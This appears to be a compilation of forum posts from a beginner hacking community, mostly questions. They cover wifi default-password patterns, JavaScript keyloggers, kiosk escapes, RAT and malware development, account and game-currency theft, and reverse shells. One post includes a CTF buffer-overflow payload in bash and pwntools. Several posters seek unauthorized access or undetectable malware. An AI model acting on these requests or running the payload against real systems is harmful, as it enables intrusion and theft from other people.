Can you make your own to execute from your own GIST URL (domain) and your script be used for your own payload?

I've been learning about network wifi security, and I've noticed that a LOT of router models I've seen have very specific password patterns used. For example:

Netgear NightHawk: <word><word><3-digits>
Fios G3100: <word><3-digits><word><3-digits>

I'm not sure if I'm just seeing a small sample size, but...

So why hasn't there been a tool made that's *just* a database for these patterns? They seem so much more "regularized" than personal passwords. Seclist's collection of wifi pass resources is a total joke (probable-v2* collection of max 4800 passwords? Is this 2001?). On the database you would type a company and Model# and you get possible patterns. It seems logical, since default wifi passwords are often kept as is because they appear "secure", but its hard to argue that if they follow "maskable" patterns. routerpasswords.com has default admin credentials, but whats the use if you can't access the actual network.

Is there something prohibitive about setting this up. Obviously there's a whole lot of routers out there, and I personally wouldn't know how to find the information without having the router in front of me. But I'm sure there's other ways to find the patterns, and user-sourced database could make the task much easier.

So again, is there something I'm missing that makes this not a "thing"?

I'm really interested and I want to know should I just start with learning to hack right away without having a coding background or do I need to code to hack. (I realize hacking needs code but I was thinking that while learning hacking and stuff like that I'll slowly build the basics and the advanced stuff with it)

I saw a video where John McAfee claimed that porn sites for example installed keyloggers on both smartphones and computers.

How is that even possible? I know enough JavaScript to manipulate DOM elements, and I understand the privacy concerns with javascript tracking every move within an open site. But I don’t see how it can run or access anything beyond that, like running commands on the system.

I can also see how someone can exploit vulnerabilities on a site that uses JavaScript, but that’s a separate issue.

So how is it possible, if possible at all, to execute and install software on a computer with JavaScript, and how can I protect myself from this?

I wasn’t sure about the flair, so please let me know if it’s wrong.

Edit: Newlines and I are stupid
I try to solve a pwn ctf challenge: I just have to input a given address after some padding to edit RIP.
I solved the challenge using a one-liner in bash. My problem is that the downloadable binary doesn't contain the flag and ncat doesn't want to work when piping input into it.

That's why I rewrote the code in python, and everything works except that the necessary null byte in the payload isn't sent.
I use pwnlib and already consulted the docs for the relevant function (sendline) but there's no info about special handling of null byte.
How do I find efficiently the reason why the null byte isn't sent, I don't know how to continue / narrow down the issue.

My (locally working) bash code:

a=""; for i in {0..99}; do if printf '%s\x96\x11\x40\x00' "$a" | ./updater | grep -i flag; then break; fi; a="${a}a"; done

My not working python code:

#!/bin/env python
from pwn import *
from sys import argv

for i in range(100):
    if len(argv) > 1:
        r = process("./updater")
    else:
        r = remote(
            "UUID.library.m0unt41n.ch", 31337, ssl=True
        )
    payload = b"a" * i + b"\x96\x11\x40\x00" # => Here is the relevant NULL byte
    print(payload) # => NULL byte is present
    r.sendline(payload)
    ans = r.recvall()
    print(i, ans) # => NULL byte is not present, rest of payload is
    if b"flag" in ans.lower():
        break

(Btw. why isn't it possible to replace ./updater in the bash code with ncat --ssl uuid.library.m0unt41n.ch 31337)

Can i track where the data is going my friends mom was made to download the app and there are stealing the message and otp

I've downloaded Medusa (password cracking program). Watched multiple tutorial videos on it. Read a bunch of articles explaining the command line flags. Thought I had it right only to get messages that all 100 passwords tried were correct (no way). Any help would be greatly appreciated.

1. Find a way to enter webnovel
2. Fins out how to code and add coins to myself
3. Add coins
4. Gift people gifts

(Webnovel severely underpass its writers and its below minimum wage must the time that on top of just straight up being able to steal your novel and stop paying you any time)

Idk how to hack servers ethically or not so this is my goal atm

Hi all, occasionally I've seen dom redirect findings in burp. I'm not an expert on the dom. I went through the portswigger lab on the topic and honestly watched one of the community videos on it that was very helpful in helping me understand it. Unfortunately that lab used the exec.location sink which was easy to exploit in the url bar. But im now looking at an example that uses location.href and it doesn't seem to work in the same way.

Can anyone give me some guidance either directly or providing a resource that will help me understand these other sinks and how i can interact with them?

Hi! I know absolutely nothing about hackers, but one of the characters in a story I’m writing is pretty good at hacking into websites and etc - I don’t want to write this character stupidly, and I know my lack of hacking knowledge will probably make my writing really dumb when it comes to this. I was wondering if I could get like a very simple rundown on the absolute basics of hacking, or some tips every hacker knows? Or anything else you think will be useful!

I’m really sorry if I’m not meant to ask this on this subreddit, I looked on another hacking subreddit and it was more specific but there was a link to this one :D I’ll delete if need be!!

I ran Nmap scan with the command nmap -p 80,443 --script vuln target.com. It showed vulnerabilities, but when I try to access them, I get a "page not found" error. I'm appending the files names in the scan result to the URL (like target.com/BackupConfig.php), but I still get a "page not found" error. As I'm new to this, I'm wondering if I'm missing something. Could someone please help me understand what I might be doing wrong?

Below are scan results and I'm not able to open any file or folder.

/BackupConfig.php: NETGEAR WNDAP350 2.0.1 to 2.0.9 potential file download and SSH root password disclosure

/Info.live.htm: Possible DD-WRT router Information Disclosure (BID 45598)

/cgi-bin/config.exp: Cisco RV320/RV325 Unauthenticated Diagnostic Data & Configuration Export (CVE-2019-1653)

/jmx-console/: Authentication was not required

/zip/: Potentially interesting folder

/_docs/: Potentially interesting folder

So, I have a RHEL 7 system that automatically logs into a restricted kiosk user that only has access to Firefox ESR & Wireshark. All hotkeys are disabled. About:config is locked down. I was hoping to locate a way to open a terminal. I can access the file system via file, open. But I cant actually execute any files. I was able to save a file to home, var and tmp. So I have write access to at least those directories.

Is there some buried menu in either app where I can launch a terminal?

So recently i've been hacked, because i was just dowloading some torrents. Well and it just really motivated me i was always interested in learning so. But i have no idea where to start. I have some basic knowledge of python, but even tho i watched many many videos i am still quite confused about where to start.

Hey everyone,

I've been really intrigued by how many hacks seem to be out there for massive games backed by huge companies. Take games like GTA, Fortnite, or COD or whatever—they’ve got insane budgets, are backed by huge companies, massive dev teams, and you’d think ironclad security. But you still see modders and hackers running wild, like those very common in GTA to cheats in paid Fortnite competitions.

So it got me thinking: does this mean hacking any game is just as easy? Like, what about smaller-scale online games? For example, these mobile strategy games that have people paying so much money like Whiteout Survival or even browser games like Conflict of Nations—are these way easier to hack because they don’t have the same resources or security teams as a Rockstar or Epic Games?

So what is it? Is there something more to it—like the popular games attract more skilled hackers who are motivated to find and exploit weaknesses that spend long weeks/months trying because there’s huge profit involved (selling it to a huge customer base), while less popular games might not even be worth the effort?

I’m genuinely curious because if hacking happens so widely in AAA titles, what stops smaller games from being completely vulnerable? Is hacking games in general just way harder than it looks, or is it more about popularity and payout?

Would love to hear your thoughts on this!

Please someone help, what is proxy softcore RTTD, 02.GP3.11V/IP11? Is it a key, license, etc? And what would it do or be used for?

Hey all. My company has been getting fake CEO texts for the past couple of years. We are a pretty tight company that communicate everyday, so everyone knew immediately that it was not the actual CEO. At this point it's more of an annoyance. I would love to teach the person a lesson and reverse hack them or something. Any tips or tricks? Or is this not the right place for that kind of info? Thanks

Hey guys. I’m in need of y’all help. I received an email saying they gained access to my email and they installed consul strike beacon and they’re monitoring me and i should send money via bitcoin and if i don’t they’ll release my information and my personal videos of me pleasuring myself. I’ve done my research and realized that it’s a typical scam email. The only worry i have now is they sent that to me…from me. The same email. For example Johndoe@gmail to johndoe@gmail. Please help

I’m wanting to use a Pi on the go as a vpn host for my devices. I’m wanting to be able to use ssh to the pi from my phone, and connect other devices, More securly from a public network I may join traveling.

Is there a Network Adapter version of a travel router? That gets its power from a USB port on a pi?

[ Removed by Reddit on account of violating the content policy. ]

yo, i want to start coding a rat for a project, im currently learning cybersecurity and im trying to code different projects, i need some roadmap or resources for rat developing in C#, can anyone help? Thanks!

Hi! I'm an engineering student from France trying to learn more about making malware (specifically for Windows). I already know a bit about C, Python, as well as HTML/CSS/JS.

So I was wondering : what do you guys think of courses like Sektor7, MalDev Academy, and zeropointsecurity?

Maldev Academy looks nice, but it's way too expensive (180$ for 6 months, seriously??)

Another thing I'm worried about is the service closing down. Since it's not just a zip file or a PDF I can download, how exactly am I supposed to follow the course in the event of the service closing down?

Can i use my Android phone to install an application so i can connect to any device and simulate a bad usb script?

How to get Epic games Account data from just seing the ingame name .So how to actually hack an Epic games account with just the ingame name or just the email.

Our government has been handing out devices such as tabs and cell phones to students. I have received a Samsung tab a9 which is under the knox administration of the government, so it's neither stolen nor a company device. They don't care what u do with it except the fact that u can't change the wallpaper.

This makes the device quite laggy and forces the faces of politicians as forced wallpapers. How can i get rid of knox.

I only have a basic understanding of knox and all methods i have found are temporary in nature i.e. it's only able to disable it for a short while i.e. only till next factory reset or update or else the other methods are basically to root the device which is also reported to degrade the performance by quite a lot such as battery performance so back to square one.

What should i do to get a permanent fix? Is it possible without touching the hardware or not? Would a basic IMEI change be sufficient to bypass KNOX?

Soooo I have this classic book (Hacking: The Art of Exploitation 2nd edition) and i set the cd or iso up on Virtual Box. The terminal pops up and all but how do i write the first C program?

Edit: A few minutes after I posted this I figured it out. I'm just gonna save this post for the future.

Hey guys. I just got started with web hacking. I've been tasked with trying to access MySQL database. So far I've tried to brute force the passwords with metasploit BUT it's taking too long and my internet can't keep up. The database is for a vulnerable target web app. Any tips or resources on how I can work around this? My primary goal is to see whether I can gain access to the DBMS and possibly run personal queries. The version is MySQL 5.7.44. Please help

I find zipbombs to be funny as fuck and so I collect them. Looking to make a few more of my own to pad out my collection. My question is how one makes them "detonate" properly instead of extracting only the first layer.

Edit: I don't intend to send them to people I just like having them No malicious intent here, just an autistic fixation on zipbombs.

* for MOD

there's no reviews available on google and the books is also different on shopping sites , so please don't remove this post

thanks.

Reverse shell help

So I recently learnt about reverse shells so using netcat I set my host machine parrot as listener and kali as attack machine everything turned out okay so I decided to phone a friend and see if i could connect to his machine (windows) I used www.revshells.com to generate a msf script it failed due to public ip and private ip being different and accessing said ports on the internet any advice??

Hey guys is it possible to embbed fud rat in images or pdf files or is there any other way you would suggest